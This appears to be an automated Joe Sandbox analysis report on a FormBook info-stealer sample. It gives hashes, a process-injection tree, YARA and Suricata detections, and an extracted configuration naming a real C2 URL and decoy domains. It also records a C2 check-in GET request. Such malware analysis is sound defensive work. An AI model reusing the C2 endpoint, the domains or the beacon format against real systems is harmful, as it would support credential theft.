Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PI916810.exe

Overview

General Information

Sample name:PI916810.exe
Analysis ID:1548156
MD5:dc96f5ae5ade3e42324fa9c34bc6a43d
SHA1:4a882ad9ad5e3c18635c6bcebd829c7f5e4d503a
SHA256:63cfb08a37c680b7bd8c3a16340a69f92e1837b9ec57104e1f826c675316e278
Tags:exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PI916810.exe (PID: 1856 cmdline: "C:\Users\user\Desktop\PI916810.exe" MD5: DC96F5AE5ADE3E42324FA9C34BC6A43D)
    • svchost.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\PI916810.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WWAHost.exe (PID: 616 cmdline: "C:\Windows\SysWOW64\WWAHost.exe" MD5: 7C7EDAD5BDA9C34FD50C3A58429C90F0)
          • cmd.exe (PID: 6760 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 33 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.PI916810.exe.1a00000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.PI916810.exe.1a00000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0.2.PI916810.exe.1a00000.1.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.PI916810.exe.1a00000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.PI916810.exe.1a00000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\PI916810.exe", CommandLine: "C:\Users\user\Desktop\PI916810.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI916810.exe", ParentImage: C:\Users\user\Desktop\PI916810.exe, ParentProcessId: 1856, ParentProcessName: PI916810.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI916810.exe", ProcessId: 6300, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\PI916810.exe", CommandLine: "C:\Users\user\Desktop\PI916810.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI916810.exe", ParentImage: C:\Users\user\Desktop\PI916810.exe, ParentProcessId: 1856, ParentProcessName: PI916810.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI916810.exe", ProcessId: 6300, ProcessName: svchost.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T03:14:22.217043+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549706TCP
          2024-11-04T03:15:01.278188+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549902TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-04T03:14:39.357291+010020314531Malware Command and Control Activity Detected192.168.2.549796199.59.243.22780TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
          Multi AV Scanner detection for submitted file
          Source: PI916810.exeReversingLabs: Detection: 28%
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: PI916810.exeJoe Sandbox ML: detected
          Source: PI916810.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: WWAHost.pdb source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004C4696
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CC93C FindFirstFileW,FindClose,0_2_004CC93C
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004CC9C7
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF200
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF35D
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CF65E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3A2B
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004C3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3D4E
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004CBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CBF27

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49796 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49796 -> 199.59.243.227:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49796 -> 199.59.243.227:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.227 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.9net88.net/ge07/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.eloshost.xyz
          Source: DNS query: www.lray-civil.xyz
          Source: DNS query: www.ool-covers76.xyz
          Source: DNS query: www.ithin-ksvodn.xyz
          Tries to resolve many domain names, but no domain seems valid
          Source: unknownDNS traffic detected: query: www.eloshost.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ithin-ksvodn.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ool-covers76.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.ridesmaidgiftsboutiqueki.shop replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.lray-civil.xyz replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.g18q11a.top replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.elonix-traceglow.pro replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.rowadservepros.net replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.lasterdeals.shop replaycode: Name error (3)
          Source: unknownDNS traffic detected: query: www.azl.pro replaycode: Name error (3)
          Source: global trafficHTTP traffic detected: GET /ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
          Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49706
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49902
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\PI916810.exeCode function: 0_2_004D25E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004D25E2
          Source: global trafficHTTP traffic detected: GET /ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF HTTP/1.1Host: www.9net88.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.9net88.net
          Source: global trafficDNS traffic detected: DNS query: www.lasterdeals.shop
          Source: global trafficDNS traffic detected: DNS query: www.eloshost.xyz
          Source: global trafficDNS traffic detected: DNS query: www.lray-civil.xyz
          Source: global trafficDNS traffic detected: DNS query: www.ool-covers76.xyz
          Source: global trafficDNS traffic detected: DNS query: www.azl.pro
          Source: global trafficDNS traffic detected: DNS query: www.ithin-ksvodn.xyz
          Source: global trafficDNS traffic detected: DNS query: www.g18q11a.top
          Source: global trafficDNS traffic detected: DNS query: www.rowadservepros.net
          Source: global trafficDNS traffic detected: DNS query: www.ridesmaidgiftsboutiqueki.shop
          Source: global trafficDNS traffic detected: DNS query: www.elonix-traceglow.pro
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000003.00000002.4486573997.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2044763297.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000003.00000002.4492745414.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2048880486.0000000009B0B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000000.2048880486.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4492745414.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.2048246007.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2048278043.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2047748419.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000003.00000003.2423600327.000000000CA04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4498280265.000000000CA05000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.9net88.net
